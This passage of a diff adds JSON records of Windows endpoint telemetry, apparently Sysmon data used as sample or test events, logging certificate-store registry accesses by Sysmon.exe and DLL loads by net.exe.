"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909330000, + 
"unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "net.exe", + "image_path": "C:\\Windows\\System32\\net.exe", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "srvcli.dll", + "image_path": "C:\\Windows\\System32\\srvcli.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\My", + "registry_value": "My", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909490000, + "unique_pid": 
"{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\System32\\version.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 
2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
